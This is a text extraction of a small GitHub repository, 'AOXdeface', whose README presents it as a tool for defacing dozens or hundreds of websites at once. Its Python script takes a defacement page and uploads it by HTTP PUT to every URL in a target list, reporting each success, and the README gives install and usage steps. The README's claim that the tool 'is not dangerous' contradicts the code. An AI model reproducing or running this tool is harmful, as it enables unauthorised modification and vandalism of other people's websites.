Repository: Ranginang67/AOXdeface
Branch: master
Commit: 184e72b86360
Files: 4
Total size: 3.0 KB
Directory structure:
gitextract_gj05al1v/
├── README.md
├── aox.py
├── img/
│ └── example
└── target.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# AOXdeface
what is AOXdeface tools?<br>
AOXdeface is a tool for defacing dozens or hundreds of sites at once,depending on the number
of sites that have been determined by you, this is not dangerous, and this is only the file upload method<br>
INDONESIA:<br>
AOXdeface adalah alat untuk melakukan defacing terhadap puluhan atau ratusan situs sekaligus,<br>
tergantung pada jumlah situs yang telah ditentukan oleh kamu :V, ini tidak berbahaya,<br>
dan ini hanya metode upload file saja
**screnshoot:**

**how to install and usage:**
**Termux:**
* `pkg install python2`
* `pip2 install requests`
* `pkg install git`
* `git clone https://github.com/Ranginang67/AOXdeface`
* `cd AOXdeface`
* `python2 aox.py`
**Linux:**
* `apt-get install python`
* `apt-get install pthon-pip`
* `pip install requests`
* `apt-get install git`
* `git clone https://github.com/Ranginang67/AOXdeface`
* `cd AOXdeface`
* `python aox.py`
**NOTE:** before using this tool, put your deface script with the aox.py file, edit the file 'target.txt' and enter the target url
[YOUTUBE](https://www.youtube.com/channel/UCNMD5U02GFeWLqmrl_XSPGQ) <br>
[TLEGRAM](https://t.me/Msambari)
================================================
FILE: aox.py
================================================
#-*- coding: utf-8 -*-
try:
import requests
import os.path
import sys
except ImportError:
exit("install requests and try again ...")
banner = """
█████╗ ██╗ ██╗██████╗ Author : Ms.ambari
██╔══██╗╚██╗██╔╝██╔══██╗ Date : 2018-12-01
███████║ ╚███╔╝ ██║ ██║ Tools : aoXdeface V.1.0
██╔══██║ ██╔██╗ ██║ ██║ Github : /Ranginang67
██║ ██║██╔╝ ██╗██████╔╝ youtube: Ms.ambari
╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝
"""
b = '\033[31m'
h = '\033[32m'
m = '\033[00m'
def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)
return str(ipt)
def aox(script,target_file="target.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print("uploading file to %d website"%(len(target)))
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script))
except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()
def main(__bn__):
print(__bn__)
while True:
try:
a = x("Enter your script deface name: ")
if not os.path.isfile(a):
print("file '%s' not found"%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()
aox(a)
if __name__ == "__main__":
main(banner)
================================================
FILE: img/example
================================================
================================================
FILE: target.txt
================================================
http://your-target1.com
http://your-target2.com
http://your-target2.com
gitextract_gj05al1v/ ├── README.md ├── aox.py ├── img/ │ └── example └── target.txt
SYMBOL INDEX (3 symbols across 1 files) FILE: aox.py function x (line 24) | def x(tetew): function aox (line 33) | def aox(script,target_file="target.txt"): function main (line 55) | def main(__bn__):
Condensed preview — 4 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (4K chars).
[
{
"path": "README.md",
"chars": 1227,
"preview": "# AOXdeface\n\nwhat is AOXdeface tools?<br>\nAOXdeface is a tool for defacing dozens or hundreds of sites at once,depending"
},
{
"path": "aox.py",
"chars": 1773,
"preview": "#-*- coding: utf-8 -*-\n\ntry:\n import requests\n import os.path\n import sys\nexcept ImportError:\n exit(\"install req"
},
{
"path": "img/example",
"chars": 1,
"preview": "\n"
},
{
"path": "target.txt",
"chars": 72,
"preview": "http://your-target1.com\nhttp://your-target2.com\nhttp://your-target2.com\n"
}
]
About this extraction
This page contains the full source code of the Ranginang67/AOXdeface GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 4 files (3.0 KB), approximately 1.0k tokens, and a symbol index with 3 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.